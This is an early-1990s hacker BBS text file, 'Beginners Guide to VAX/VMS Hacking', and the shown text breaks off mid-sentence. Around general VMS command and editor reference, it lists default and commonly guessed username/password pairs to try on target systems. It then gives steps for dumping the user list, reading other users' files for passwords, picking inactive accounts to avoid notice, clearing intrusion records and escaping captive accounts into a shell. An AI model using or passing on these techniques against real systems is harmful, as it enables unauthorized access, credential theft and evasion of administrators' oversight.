home *** CD-ROM | disk | FTP | other *** search
/ Phoenix Rising BBS / phoenixrising.zip / phoenixrising / hack-1 / vaxc.txt < prev    next >
Text File  |  1992-01-01  |  150KB  |  3,352 lines

  1. +----------------------------------------------------------------------------+
  2. !                     Beginners Guide to VAX/VMS Hacking                     !
  3. !                                                                            !
  4. !             File By ENTITY /  Corrupt Computing Canada  (c)                !
  5. !                                                                            !
  6. !                                                                            !
  7. !                          CORRUPT COMPUTING CANADA!                         !
  8. !                                                                            !
  9. !                                                                            !
  10. +----------------------------------------------------------------------------+
  11. !                                                                            !
  12. ! You may freely distribute this file as long as no modifications of any     !
  13. ! form are made to the file. All rights reserved by...What rights?!          !
  14. !                                                                            !
  15. !                                                                            !
  16. +----------------------------------------------------------------------------+
  17.  
  18.  
  19.  
  20. INTRODUCTION
  21. ------------
  22.  
  23.  
  24.        Perhaps the most exciting Operating system to HACK on is VAX/VMS.
  25. It offers many challenges for hackers and boasts one of the best security
  26. systems ever developed.  In comparison to the security on UNIX, VMS is far
  27. superior in every respect.  It can be very difficult to get inside such a
  28. system and even harder to STAY inside, but isn't that what this is all about?!
  29. I have written this file as a way for beginning hackers to learn about the VMS
  30. operating system.  There is such a vast amount of information that can be
  31. related about VAX/VMS hacking that it is not possible for me to cover
  32. everything in just one file.  As such i will try and stick to the basics for
  33. this file and hopefully write another file in the future that deals with
  34. heavy-duty kernal programming, the various data structures, and system service
  35. calls. All right so lets get at it!
  36.  
  37.  
  38.  
  39.  
  40. GETTING IN
  41. ----------
  42.  
  43.        First of all how do you recognize a VAX when you see one?! Well the
  44. thing that always gives a VAX away, is when you logon you will see:
  45.  
  46. Username:
  47.  
  48. It may also have some other info before it asks you for the username, usually
  49. identifying the company and perhaps a message to the effect of:
  50.  
  51. Unauthorized Users will be prosecuted to the fullest extent of the law!
  52.  
  53. That should get you right in the mood for some serious hacking!  Ok so when you
  54. have determined that the system you have logged into is indeed a VAX, you will
  55. have to at this point enter your SYSTEM LOGIN.  Basically on VAX's there are
  56. several default logins which will get you into the system. However on MOST
  57. systems these default logins are changed by the system manager. In any case,
  58. before you try any other logins, you should try these (since some system
  59. managers are lazy and don't bother changing them):
  60.  
  61. Username           Password        Alternate
  62. -------------------------------------------------------------------------------
  63.  
  64. SYSTEM             MANAGER         OPERATOR
  65. FIELD              SERVICE         TEST
  66. DEFAULT            DEFAULT         USER
  67. SYSTEST            UETP            SYSTEST
  68. DECNET             DECNET          NONPRIV
  69.  
  70.  
  71. That's it. Those are the default system users/passwords.  The only ones on the
  72. list that are GUARANTEED to be in the userlist are SYSTEM and DEFAULT. However,
  73. I have never come across a system where these two haven't been changed from
  74. their default passwords to something else.  In the above list, the alternate
  75. password is simply a password many operators set the password to from the
  76. deafult. So if the first password doesn't work, try the alternate password.  It
  77. should be noted when the a user is added into the system, the default password
  78. for the new user the SAME as his username.  You should keep this point in mind
  79. because it is VERY important. Most of the accounts you hack out, will be found
  80. in this way! Ok if above ones don't work,  then you should try these accounts.
  81. These following accounts are NOT defaults, but through experience i have found
  82. that many systems use these accounts or some variation thereof:
  83.  
  84. Username           Password
  85. ---------------------------
  86. VAX                VAX
  87. VMS                VMS
  88. DCL                DCL
  89. DEC                DEC       *
  90. DEMO               DEMO      *
  91. TEST               TEST      *
  92. NETNONPRIV         NONPRIV   *
  93. NETPRIV            PRIV
  94. ORACLE             ORACLE    *
  95. ALLIN1             ALLIN1    *
  96. INGRES             INGRES    *
  97. GUEST              GUEST     *
  98. GAMES              GAMES
  99. BACKUP             BACKUP    *
  100. HOST               HOST
  101. USER               USER      *
  102. DIGITAL            DIGITAL
  103. REMOTE             REMOTE    *
  104. SAS                SAS
  105. FAULT              FAULT
  106. USERP              USERP
  107. VISITOR            VISITOR
  108. GEAC               GEAC
  109. VLSI               VLSI
  110. INFO               INFO      *
  111. POSTMASTER         MAIL
  112. NET                NET
  113. LIBRARY            LIBRARY
  114. OPERATOR           OPERATOR  *
  115. OPER               OPER
  116.  
  117. The ones that have asterisks (*) beside them are the more popular ones and you
  118. have a better chance with them, so you should try them first. It should be
  119. noted that the VAX will not give you any indication of whether the username
  120. you typed in is indeed valid or not.  Even if you type in a username that does
  121. not exist on the system, it will still ask you for a password.  Keep this in
  122. mind because if you are not sure if whether an account exists or not, don't
  123. waste your time in trying to hack out its password. You could be going on a
  124. wild goose chase!  You should also keep in mind that ALL bad login attempts are
  125. kept track of and when the person logs in, he is informed of how many failed
  126. attempts there were on his account.  If he sees 400 login failures, I am sure
  127. that he will know someone is trying to hack his account.
  128.  
  129.  
  130.  
  131.  
  132. THE BASICS
  133. ----------
  134.  
  135. Ok i am assuming you tried all the above defaults and managed to get yourself
  136. into the system. Now the real FUN begins!  Ok first things first. After you log
  137. in you will get some message about the last time you logged in etc. If this is
  138. the first time you have logged into this system then you should note the last
  139. login date and time and WRITE IT DOWN! This is important for several reasons.
  140. The main one being that you want to find out if the account you have just
  141. hacked is an ACTIVE or INACTIVE account.  The best accounts are the inactive
  142. ones. Why?! Well the inactive accounts are those that people are not using
  143. currently, meaning that there is a better chance of you holding onto that
  144. account and not being discovered by the system operator.  If the account has
  145. not been logged into for the last month or so, theres a good chance that it
  146. is inactive.  Ok anyhow once your in, if you have a normal account with access
  147. to DCL you will get a prompt that looks like:
  148.  
  149. $
  150.  
  151. This may vary from machine to machine but its usually the same. If you have a
  152. weird prompt and would like a normal one, type:
  153.  
  154. $set prompt=$
  155.  
  156. If this is the first time you have hacked into this system there are a couple
  157. of steps you should take immediately. First type:
  158.  
  159. $set control=(y,t)
  160.  
  161. This will enable your break keys (like ctrl-c) so that you can stop a file or
  162. command if you make a mistake.  Usually ctrl-c is active, but this command will
  163. insure that it is. (Note: in general to abort a command, or program you can
  164. type ctrl-c or ctrl-y) Ok anyhow, the next step is to open the buffer in your
  165. terminal then type:
  166.  
  167. $type sys$system:rightslist.dat
  168.  
  169. This will dump a file that has all the systems users listed in it.  You may
  170. notice a lot of weird garbage characters. Don't worry about those, that is
  171. normal.  Ok after this file ends and you get the shell prompt again ($) then
  172. save the buffer, clear it out and leave it open. Then type:
  173.  
  174. $show logical
  175.  
  176. Ok after this file is buffered save it also.  Ok at this point you have two
  177. files on your disk which will help you hack out MORE accounts on the system.
  178. For now, lets find out how powerful the account you currently hacked into is.
  179. You should type:
  180.  
  181. $set proc/priv=all
  182.  
  183. This may give you a message telling you that all your privileges were not
  184. granted. That's ok. Now type:
  185.  
  186. $show proc/priv
  187.  
  188. This will give you a list of all the privileges your account is set up for.
  189. Usually most user accounts only have NETMBX and TMPMBX privs.  If you have
  190. more than these two, then it could mean that you have a nice high-level user.
  191. Unlike UNIX which only has a distinction between user and superuser, VMS has
  192. a whole shitload of different privileges you can gain.  The basic privs are as
  193. follows:
  194.  
  195. PRIVILEGE      DESCRIPTION
  196. ------------------------------------------------------------------------------
  197. NONE           no privilege at all
  198.  
  199.  
  200. NORMAL PRIVS
  201. ------------
  202. MOUNT          Execute mount volume QIO
  203. NETMBX         Create network connections (you need this to call out!)
  204. TMPMBX         Create temporary mailbox
  205.  
  206.  
  207. GROUP PRIVS
  208. -----------
  209. GROUP          Control processes in the same group
  210. GRPPRV         Group access through SYSTEM protection field
  211.  
  212.  
  213. DEVOUR PRIVS
  214. ------------
  215. ACNT           Disable accounting
  216. ALLSPOOL       Allocate spooled devices
  217. BUGCHK         Make bugcheck error log entries
  218. EXQUOTA        Exceed disk quotas
  219. GRPNAM         Insert group logical names n the name table
  220. PRMCEB         Create/delete permanent common event flag clusters
  221. PRMGBL         Create permanent global sections
  222. PRMMBX         Create permanent mailboxes
  223. SHMEM          Create/delete structures in shared memory
  224.  
  225.  
  226. SYSTEM PRIVS
  227. ------------
  228. ALTPRI         Set base priority higher that allotment
  229. OPER           Perform operator functions
  230. PSWAPM         Change process swap mode
  231. WORLD          Control any process
  232. SECURITY       Perform security related functions
  233. SHARE          Access devices allocated to other users
  234. SYSLCK         Lock system-wide resources
  235.  
  236.  
  237. FILES PRIVS
  238. -----------
  239. DIAGNOSE       Diagnose devices
  240. SYSGBL         Create system wide global sections
  241. VOLPRO         Override volume protection
  242.  
  243.  
  244. ALL PRIVS
  245. ---------
  246. BYPASS         Disregard protection
  247. CMEXEC         Change to executive mode
  248. CMKRNL         Change to kernal mode
  249. DETACH         Create detached processes of arbitrary UIC
  250. LOG_IO         Issue logical I/O requests
  251. PFNMAP         Map to specific physical pages
  252. PHY_IO         Issue physical I/O requests
  253. READALL        Possess read access to everything
  254. SETPRV         ***  ENABLE ALL PRIVILEGES!!! ***
  255. SYSNAM         Insert system logical names in the name table
  256. SYSPRV         Access objects through SYSTEM protection field
  257.  
  258.  
  259. Ok that's the lot of them! I will explain some of the more important privileges
  260. later in the file.  For now, at least you can see just how powerful the account
  261. is.  It should be noted that most accounts usually are only granted the TMPMBX
  262. and NETMBX privileges, so if you don't have the others, don't fret too much.
  263.  
  264.  
  265.  
  266. GENERAL TERMINOLOGY
  267. -------------------
  268.  
  269.     I think that i should clarify some of the basic concepts involved with
  270. VAX/VMS operating systems before we go any further:
  271.  
  272. PROCESS: this is what is created when you log in.  The system sets aside CPU
  273.          time and memory for you and calls it a process. Any task that is run
  274.          in VMS is called a process.
  275.  
  276. SUBPROCESS: also known as child-process, this is just a process that was
  277.             created by another process.
  278.  
  279. DCL    : Digital Command Language. This is the shell ($) that you are put into
  280.          when you log into a VAX
  281.  
  282. MCR    : an alternate shell that is used (rarely) on certain accounts. Login
  283.          prompt is a  >  as opposed to DCL which gives a  $
  284. SHELL  : this is the '$' that you see once you are logged in. This is your
  285.          interface with the system, where you can enter the various commands
  286.          execute files and perform other activities.
  287.  
  288. JOB    : a process and a group of its subprocesses performing some task
  289.  
  290. SPAWN  : this is the actual command that allows you to create subprocesses
  291.          'SPAWNING' is the act of creating subprocesses
  292.  
  293. PID    : process identification number. This is an 8 byte ID code that is
  294.          uniquely given to each process that is created on the system.
  295.  
  296. IMAGE  : this is an EXE file that you can execute (ie run)
  297.  
  298. UIC    : User identification code. This is in two parts, namely: [group,member]
  299.          The way this works is that users in the same group can access each
  300.          others files through the group protection code.  However since the UIC
  301.          MUST uniquely identify each user, the member portion separates the
  302.          individuals in each group.  If an account does not have a different
  303.          member number, he will NOT be put in the RIGHTSLIST database.
  304.  
  305.  
  306.  
  307. CONTROL KEYS
  308. ------------
  309.  
  310.  A brief note on control sequences.  Several different actions can be activated
  311. via control sequences. They are:
  312.  
  313. CTRL-H  :delete last character
  314. CTRL-B  :redisplay last command (can go back up to the last 20 commands issued)
  315. CTRL-S  :pause display
  316. CTRL-Q  :continue after pause
  317. CTRL-Z  :*EXIT* use to break out of things such as CREATE and EDIT
  318. CTRL-C  :*CANCEL* will exit out of most operations
  319. CTRL-Y  :*INTERRUPT* will break out of whatever you are doing
  320. CTRL-T  :print out statistical info about the process
  321.  
  322. NOTE: sometimes upon login, the CTRL-Y, CTRL-C keys are disabled.  To ensure
  323.       these are enabled, issue this command upon login:
  324.  
  325. $ SET CONTROL
  326.  
  327.  
  328. -------------------------------------------------------------------------------
  329. NOTE: all the commands that are executed from DCL can be referenced from an
  330.       online help manual.  To access this, simply type help at any '$' prompt
  331.       This help is also available within the various utilities and programs
  332.       such as authorize and mail. The two MOST important commands are SET and
  333.       SHOW. These should be buffered and printed out for your own reference.
  334. -------------------------------------------------------------------------------
  335.  
  336. FILES and DIRECTORIES
  337. ---------------------
  338.  
  339.  The directory structure of VMS is a heirarchical one similar to MS-DOS and
  340. UNIX. Its a simple concept, and i will only briefly skim over it.  First of all
  341. it should be noted that there may be more than one hard drive or other
  342. mass-storage device hooked up to your system. Within each hard drive there is
  343. the ROOT directory. This is the highest directory in the tree and is referenced
  344. by [000000]. (this will be explained in a minute)  Within the root there are
  345. several subdirectories. Within these subdirectories there may be files and even
  346. further subdirectories.  The concept is quite simple, but can be difficult to
  347. explain.  Here is a diagram to give you a rough idea of how it is set up:
  348.  
  349.  
  350.  
  351.                                  [000000] <--root directory
  352.                                      !
  353.                                      !
  354.           +--------------------------+---------------------------------+
  355.           !                          !                                 !
  356.           !                          !                                 !
  357.         [d1]                       [d2]                              [d3]
  358.           !                          !                                 !
  359.     +-----+--------+           +-----+-----+                  +--------+
  360.     !     !        !           !           !                  !        !
  361.     !     !        !           !           !              [d3.d3a]  [d3.d3b]
  362.  [d1.da] [d1.db] [d1.dc]    [d2.d2a]   [d2.d2b]
  363.             !                  !           !
  364.             !                  !        +--+-----------+
  365.        [d1.db.db1]        [d2.d2a.d2a1] !              !
  366.                                        [d2.d2b.d2b1] [d2.d2b.d2b2]
  367.  
  368.  
  369.  
  370.  
  371.     Hopefully this will give you some sort of an idea of how the directories
  372. can be structured. Within each subdirectory there may be other files also. For
  373. example to see the directory after you log in you would type:
  374.  
  375. $dir
  376.  
  377. a sample result may be:
  378.  
  379.  
  380. Directory DISK$SCHOOL:[REPORTS.JOHN]
  381.  
  382. average.com;3
  383. generate.exe;1
  384. mail.mai;10
  385. marks.dat;4
  386. marks.dat;5
  387. reportcard.dir
  388. projects.dir
  389.  
  390. Total 7 files.
  391.  
  392. What does this tell you? The first line tells you what drive and subdirectory
  393. you are in. The next lines are the actual files. As you can see each file has
  394. a 3 character extension, followed by a comma and a number.  The name before the
  395. period is the actual filename (eg. average) the 3 characters after the period
  396. is known as the extension (eg.com) and the number after the comma refers to the
  397. version of the file. So in this case, this is version number 3.  Any time you
  398. modify or save a file, it automatically assigns it a version number of 1. If
  399. file already exists on your disk, it increments the version number by 1 and
  400. then saves it as such.  So the next time i go ahead and save the file
  401. average.com, it would add another file to the list called average.com;4
  402.   Special note should be taken of the files that have an extension of '.DIR'
  403. These are not really files, but rather subdirectories.  I will show you how to
  404. switch subdirectories in just a minute. First you should take note of the
  405. different file extensions.  Although you can name the files anything you want
  406. some of the more important extensions are:
  407.  
  408. TYPE      DESCRIPTION
  409. -------------------------------------------------------------------------------
  410. EXE       Executable IMAGE. These files are programs that can be RUN
  411. COM       DCL SCRIPT files. These can also be executed, utilizing the @ command
  412. DAT       DATA file. Sometimes useful things to look at.
  413. LIS       Listing File, many times important info is in here
  414. MAI       Mail file,  use the MAIL command to read these
  415. DIR       DIRECTORY - not a file
  416. JOU       Journal File, often created thru the use of other programs eg EDIT
  417. TXT       Text Files, often hold useful information.
  418.  
  419. These are just some of the extensions you are most likely to see. The two
  420. important ones are the EXE and COM files. These can be executed from the DCL
  421. level. EXE files are executed via the RUN command. Eg. to run authorize.exe:
  422.  
  423. $run authorize
  424.  
  425. This will run the authorize IMAGE. Supposing there were more than one version
  426. of authorize you could specify a version number. eg.
  427.  
  428. $run authorize.exe;4
  429.  
  430. The other type of file you can run is the COM files. These are like SCRIPT
  431. files in UNIX or .BAT files from MS-DOS.  They are just a sequence of DCL
  432. commands strung together that are executed when you initiate the file. To run
  433. COM files, use the @ command. For example to run adduser.com, type:
  434.  
  435. $@adduser
  436.  
  437. The version number thing i stated for EXE files also applies for COM files.
  438.  
  439. ***NOTE***  To get a listing of all the files on the whole drive, try this:
  440.  
  441. $sd [000000]
  442. $dir [...]*.*
  443.  
  444. Similarly you type dir [...]*.com, if you wanted just the COM files listed.
  445. To see the contents of a file, you can use the TYPE command. For example:
  446.  
  447. $type login.com
  448.  
  449. this might type out something like:
  450.  
  451. $ sd:==set default
  452. $ set control=(y,t)
  453. $ set proc/name=entity
  454. $ set term/dev=vt100
  455.          :
  456.          :
  457.          :
  458.         etc
  459.  
  460. This is great for COM files, DAT files and some of the other types, but you
  461. will always get garbage when you type EXE files so don't bother trying those.
  462. This is very useful for snooping around other peoples files and getting
  463. information. Many times i have found user/passwords lying around in TXT or
  464. LIS files left by some careless user.
  465.  
  466.  Now, how do you go about changing directories? Well, first you should set up
  467. a shortcut.  The normal command to change directories is SET DEFAULT. For
  468. example to change to a subdirectory called REPORTS, you would have to type:
  469.  
  470. $set default [.reports]
  471.  
  472. To make life simpler on yourself, as soon as you log in, you should type:
  473.  
  474. $sd:==set default
  475.  
  476. This defines a macro called SD that is interpreted by DCL as SET DEFAULT. You
  477. can similarly define other 'favorite' commands to some short, easy to remember
  478. definition.  Anyhow heres the syntax for changing directories:
  479.  
  480. SD DEVICE:[dir1.dir2.dir3....]
  481.  
  482. The device can be optionally left out, if you plan to remain in the same hard
  483. drive. You have to then enter a '[' followed by the root directory, followed
  484. by a period, followed by another subdirectory name etc. Eg.
  485.  
  486. $sd dub0:[cosy.users]
  487.  
  488. Suppose at this point, you were in directory cosy, subdirectory users and there
  489. was a further subdirectory called 'info.dir'.  Rather than specify the full
  490. pathname, you can simply type:
  491.  
  492. $sd [.info]
  493.  
  494. This will advance you one level into the info subdirectory. Remember to put the
  495. period in front of the subdirectory. If you don't, in this case it would assume
  496. that you were trying to reference the root directory called info.  Another
  497. important thing to note is moving back levels in terms of subdirectories. For
  498. example if you were in [cosy.users.info] and wanted to move back to
  499. [cosy.users] you could type:
  500.  
  501. $sd [-]
  502.  
  503. Similarly you can put in as many hyphens (-) as you want to move back. For
  504. example  sd [--]  would put you back to the cosy directory.
  505.  
  506. Another important thing to note about subdirectories are logical assigned
  507. symbols. These are names assigned to certain things. For example the main
  508. system directory is called sys$system. So to go to it you could type:
  509.  
  510. $sd sys$system
  511.  
  512. This would throw you into the system directory. Similarly you can type:
  513.  
  514. $sd sys$login
  515.  
  516. and this will put you back into the directory that you were initially in, when
  517. you first logged in.  These symbols stand for actual device:directory
  518. combinations.  To see the various definitions that are assigned to each process
  519. you should type:
  520.  
  521. $show logical
  522.  
  523. This will list a whole bunch of global system equates that you can use to
  524. access various parts of the VAX structure.  In addition to view all of your
  525. locally defined symbols, use:
  526.  
  527. $show symbol *
  528.  
  529.  
  530.  
  531. FILE PROTECTION
  532. ---------------
  533.  
  534. Ok before i begin this, let me just state that whatever i say about files also
  535. applies to directories.  There are four types of file protections. There is
  536. SYSTEM,WORLD,GROUP and OWNER. These are briefly:
  537.  
  538. SYSTEM- All users who have group numbers 0-8 and users with physical or logical
  539.         I/O privileges  (generally system managers, system programmers, and
  540.         operators)
  541. OWNER - the owner of the file (or subdirectory), isolated via their User
  542.         Identification Code (UIC). This means the person who created the file!
  543. GROUP - All users who have the same group number in their UICs as the owner of
  544.         the file.
  545. WORLD - All users who do not fall in the categories above
  546.  
  547. Each file has four types of protection within each of the above categories.
  548. They are: Read, Write, Execute, Delete. Explanations are:
  549.  
  550. READ   - You can read the file and copy it.
  551. WRITE  - You can modify and rename that file.
  552. EXECUTE- You can run the file
  553. DELETE - You can delete the file
  554.  
  555. When you create a file the default is that you have all the privileges for that
  556. particular file. Group, world and system may only have limited privileges. This
  557. can be changed with the set protection DCL command. For example:
  558.  
  559. $set protection=(group:rwed,world:r)/default
  560.  
  561. would set your default protection to allow other users in your group to have
  562. full read,write,execute,delete privs to the file, and others only read access
  563. to the file. The /default means that from now on all the files you create will
  564. be set with this particular protection.  To change one of your own files to
  565. some other protection you can alternatively use:
  566.  
  567. $set prot topsecret.dat /prot=(system:rwed,group:rwed,world:rwed,owner:rwed)
  568.  
  569. This would enable all users on the system to access the file 'topsecret.dat'
  570. When specifying the protection, you do not have to list them for each of the
  571. four groups.  You can simply choose only those that you want changed from your
  572. default.
  573.  
  574.  
  575.  
  576. EDITING FILES
  577. -------------
  578.  
  579.   An important utility that all VAX hackers should be familiar with is the EDT
  580. text editor. To call it up, use the EDIT DCL command. ie:
  581.  
  582. $edit [filename]
  583.  
  584. This will invoke the EDIT/EDT text editor.  The [filename] refers to the file
  585. that you want to edit.  If the file does not exist, it is created at this point.
  586. The EDT editor does not provide a default file type when creating files, so if
  587. you do not specify one, it will leave it as NULL.  It should be noted that there
  588. is more than just the EDT editor, but when you type in EDIT, the default is
  589. /EDT.  Basically it is an editor that you can use to create/modify COM or any
  590. other type of text files.
  591.  
  592.  After the editor is invoked, it keeps track of everything that you enter in a
  593. JOU file.  In case of lost carrier or some other accident, you can recover what
  594. you had by specifying the /RECOVER qualifier. For example:
  595.  
  596. $edit/recover memo.dat
  597.  
  598. This would take the last copy of memo.dat, load it into memory, then process
  599. your last JOU file, updating it to virtually exactly where you were before you
  600. got cut off.  Journaling is automatically defaulted to ON, but can be turned
  601. off with the /NOJOURNAL qualifier.  For a description of what all the qualifiers
  602. are, and what they do, refer to the online HELP manual.
  603.  
  604.  Ok here is a list of the basic commands you can perform in the EDT editor:
  605.  
  606.  
  607. --------------------------------------------------------------------------------
  608.  
  609. X   (where X = line number)............show line X only
  610. X:Y (where X,Y = line numbers).........show line X through line Y
  611. A,B,C,D (a,b,c,d = line numbers).......list lines A,B,C,D
  612. X:e ...................................list from X to end
  613. T W ...................................TYPE WHOLE. List ALL of the text lines
  614. S/string1/string2/W....................substitute ALL occurrences of string1
  615.                                        for string2 as they occur from current
  616.                                        line number downwards
  617. "string" ..............................search for first occurrence of string
  618.                                        from current line downwards
  619. T A "string" ..........................type all occurrences of string from
  620.                                        current line downwards
  621. X:Y a "string" ........................search for occurrences of string within
  622.                                        range denoted by X through Y
  623. D X ...................................Delete line X
  624. D X:Y .................................Delete line X through Y, inclusively
  625. I .....................................insert a line
  626. I X ...................................insert from line X
  627. M X:Y to Z ............................move lines X through Y to line Z
  628. RES ...................................resequence line numbers
  629. RES/SEQ:X:10 ..........................resequence from line X in intervals of 10
  630. R X ...................................replace from line X. This deletes the
  631.                                        current line and automatically goes into
  632.                                        insertion mode.
  633. EXIT ..................................leave the editor, and SAVE the current
  634.                                        text.
  635. QUIT ..................................leave the editor and DO NOT SAVE the
  636.                                        current text.
  637.  
  638. --------------------------------------------------------------------------------
  639.  
  640. A sample editing session is shown:
  641.  
  642. $edit lame.txt
  643.  
  644. * i
  645.  
  646.      hi this is just some bullshit text to test out how this EDIT program
  647.      works.  Oh well, easy enough.  bye!
  648.  
  649.      <hit ctrl-z>
  650.  
  651. *exit
  652.  
  653. $type lame.txt
  654.  
  655.  hi this is just some bullshit text to test out how this EDIT program
  656.  works.  Oh well, easy enough.  bye!
  657.  
  658. $del lame.txt;*
  659.  
  660. COMMANDS
  661. --------
  662.  
  663. In this section i will outline some of the more important commands that you can
  664. issue from the DCL level. This is not meant to be a complete guide. I will
  665. merely point out some of the more important commands and a very brief
  666. description. Proper help can be obtained from the online HELP facility.
  667.  
  668.  
  669. NOTE: It should be noted that each of the following commands may have further
  670. ----- qualifiers that you can specify. You should check up on these from the
  671.       online help also.
  672.  
  673.  
  674. @               -Lets you execute COM script files
  675. ACCOUNTING      -allows you to view and edit system accounting data that keeps
  676.                  track of what system time you have racked up.
  677. ANALYZE         -lets you view the contents of OBJ files in HEX/ASCII format.
  678. ANALYZE/SYSTEM  -Invokes the SDA. VERY VERY USEFUL!! Allows you to view other
  679.                  running processes, their type-ahead buffers etc.
  680. APPEND          -appends the contents of file1 to file2
  681. ATTACH          -allows you to attach yourself to one of your subprocesses
  682. CLOSE           -closes a file that was opened for input/output via OPEN
  683. CONTINUE        -continue a process that you have aborted with control-y
  684. COPY            -copy file1 to file2. You can specify full pathnames, with
  685.                  device and subdirectory. If you want to copy it to your home
  686.                  directory just use sys$login as your 'TO' file.
  687. CREATE          -create a text file of any type. Eg. you want to create a
  688.                  simple COM file or perhaps a letter to another hacker on the
  689.                  system. (you shouldn't be using MAIL to send messages!)
  690. CREATE/DIR      -If you want to create a subdirectory
  691. DELETE          -delete a filename. Remember to specify a version number when
  692.                  you are deleting a file or it wont work.eg. del garbage.com;1
  693. DELETE/INTRUSION_RECORD -gets rid of the failed password attempts
  694. DIFFERENCES     -compares two files and notifies you of their differences
  695. DIRECTORY       -get a directory of the files. Various qualifiers can be chosen
  696. DUMP            -get a hex/ascii file dump
  697. EDIT/EDT        -invokes the VAX EDT interactive text editor
  698. EXAMINE         -view the contents of virtual memory
  699. HELP            -ONLINE HELP MANUAL. REFER TO IT OFTEN!
  700. LINK            -link object files into EXE files that you can run
  701. LOGOUT          -the proper way to terminate a session
  702. PHONE           -Allows you to chat with another user on the system. It is not
  703.                  recommended that you use this, except with fellow hackers.
  704. RENAME          -rename a file or directory
  705. RUN             -lets you execute EXE files
  706. SET CONTROL     -disables/enables interrupts via ctrl-y/ctrl-c
  707. SET DEFAULT     -change directories
  708. SET HOST        -allows you to connect to another mainframe
  709. SET PASSWORD    -change the password of your account
  710. SET PROCESS     -change the characteristics of your process
  711. SET PROMPT      -change the prompt ($)
  712. SET TERMINAL    -change your terminal characteristics
  713. SHOW ACCOUNTING -show the current security/accounting enabled
  714. SHOW AUDIT      -show SECURITY enabled
  715. SHOW DEFAULT    -see your current directory. (Like PWD in UNIX)
  716. SHOW DEVICES    -check out the system setup
  717. SHOW INTRUSION  -view the contents of the breakin database
  718. SHOW LOGICAL    -current logical name assignments
  719. SHOW NETWORK    -lists all the available nodes that you can connect to
  720. SHOW PROCESS    -View your process settings
  721. SHOW PROTECTION -show the default protection you have set
  722. SHOW SYSTEM     -useful to see the running processes
  723. SHOW TERMINAL   -display your terminal characteristics
  724. SHOW USERS      -see who else is logged in.
  725. SPAWN           -spawn a subprocess
  726. STOP            -kill off a subprocess
  727. TYPE            -view a file
  728.  
  729.  
  730.   This should give you a general overview of some of the more important
  731. commands that you can use.  It would be impossible for me to list ALL the
  732. commands, and their descriptions, so i suggest that you go through the online
  733. HELP facility and familiarize yourself with the syntax of some these commands.
  734.  
  735.  
  736. HACKING
  737. -------
  738.  
  739. Up to this point i have mainly discussed the basic concepts involved with VMS.
  740. By now you should be familiar and comfortable with the various DCL commands
  741. and how to accomplish certain tasks.  If you are still sketchy, go back and
  742. re-read the sections you don't understand.  You may also want to log into a VAX
  743. and just try fiddling around in the shell getting used to how the whole thing
  744. works.
  745.  
  746.  In this section i will discuss some of the techniques that you may find useful
  747. in hacking out accounts, calling out to remote systems, and gaining access to
  748. confidential information.
  749.  
  750.  
  751.  Lets start from the top: When you first login to the system, after it accepts
  752. your password etc, it executes the SYLOGIN.COM file.  Then it searches your
  753. default directory for the file LOGIN.COM (this may be changed by the system
  754. manager if he wishes)  This file basically sets up your terminal parameters and
  755. perhaps some macros that you wish to be defined. It may or may not also execute
  756. some utility.
  757.  
  758.  
  759. BYPASSING LOGIN.COM
  760. -------------------
  761.  
  762.  Sometimes it may be useful to be able to skip the login procedures. For
  763. example if the system automatically runs some file as soon as you log in, and
  764. doesn't put you into the shell, this technique can be used:
  765.  
  766. Username: entity/nocomm
  767.  
  768. Assuming the user was named entity, if you put a /nocomm qualifier, it will
  769. skip the login.com file and put you directly into DCL. Similarly you can
  770. specify some other file you want executed instead of login.com. eg.
  771.  
  772. Username: entity/comm=custom.com
  773.  
  774. This will execute the custom.com file upon entry into the account.  It should
  775. be noted that these methods WILL NOT WORK on a CAPTIVE account. What is a
  776. captive account?! Read on...
  777.  
  778.  
  779. CAPTIVE ACCOUNTS
  780. ----------------
  781.  
  782.  Many times, in an attempt to make an account more secure the system manager
  783. sets the captive flag to ON, in the users profile.  What this means is that
  784. when you log in, you cannot break out of the login file into the DCL shell.
  785. This means that although you can hit ctrl-y and it may even say *interrupt*
  786. it will not actually abort the file.  So how do you exit to DCL?! Well there
  787. are a few ways. Usually accounts set up in this manner are used to allow the
  788. user to connect to other nodes.  If this is the type of account that you have
  789. logged into then try the following:  First choose an option from the menu that
  790. they present that allows you to call any node.  When it says something like
  791. %connected to...  then hit two ctrl-y in quick succession.  It will then ask
  792. you if you want to really abort the current session. Type Y and it will put you
  793. at a prompt that looks like:
  794.  
  795. PAD>
  796.  
  797. At this point you should type in SPAWN and it will spawn a process and throw
  798. you into the DCL Shell.  This is a major security flaw in VMS and can be put to
  799. good use on many a system.
  800.  
  801.  
  802. GAINING PRIVILEGES
  803. ------------------
  804.  
  805. On most systems that you hack into, you will find yourself with only TMPMBX and
  806. NETMBX privileges. To see your privs type:
  807.  
  808. $show proc/priv
  809.  
  810. These however may not be all the privileges that you have assigned. Upon login,
  811. the system only assigns you your default privileges. On some accounts you may
  812. have more than just these privileges. To see if you do, type:
  813.  
  814. $set proc/priv=all
  815.  
  816. if this doesn't give you any error message then you have found yourself a
  817. SYSTEM account! With this account you can create new users, change the security
  818. setup read other peoples files etc.  Here are a list of some of the more
  819. important privileges and what they can be used for:
  820.  
  821. CMKRNL    -change to kernal mode. Very Powerful privilege!!
  822. SETPRV    -allows you to become a Super-User. You can do whatever you want!
  823. READALL   -allows you to read other peoples files and directories regardless
  824.            of the protection
  825. OPER      -allows you to perform many useful operator functions (security etc)
  826. SYSPRV    -You can gain the same UIC as the system and access just about
  827.            anything you want. Create/modify accounts
  828. NETMBX    -allows you to call out on the network to other systems
  829. BYPASS    -this allows you to view network passwords, and to bypass all types
  830.            of protection fields
  831.  
  832. These are just some of the more important ones to the hacker.  For a complete
  833. list of all the privileges and what each one does, see the list i presented
  834. earlier in the file.
  835.  
  836. One important note: It is not possible to gain privileges that are not set up
  837. in your default from the DCL level.  There is one way to gain ALL privileges on
  838. ANY Vax but it involves some serious kernal programming.  I could outline the
  839. program here but i chose not to.  The reason for this is that many people would
  840. abuse the system if they had access to wiping out hard drives and totally
  841. trashing the system.  If you work from the ground up, you begin to realize just
  842. how important gaining extra access is. You begin to respect the VMS system for
  843. what it is.  A system account in the hands of novice is a very dangerous thing
  844. indeed, and my suggestion is that if you have a SYSTEM account that has more
  845. than just the default privileges that you should disable them.  This will only
  846. help you from making any mistakes and screwing up the system.  To do this type:
  847.  
  848. $set proc/priv=noall
  849. $set proc/priv=(tmpmbx,netmbx,readall)
  850.  
  851. With these privileges you should be able to easily navigate throughout the
  852. system without messing anything up.  Keep one thing in mind, don't delete files
  853. unless you have created them! People will notice things like this and you are
  854. guaranteed to lose your account.
  855.  
  856.  Once you are an experienced hacker you may wish to create a program that gives
  857. you more privileges.  To get you started in this direction i will give you
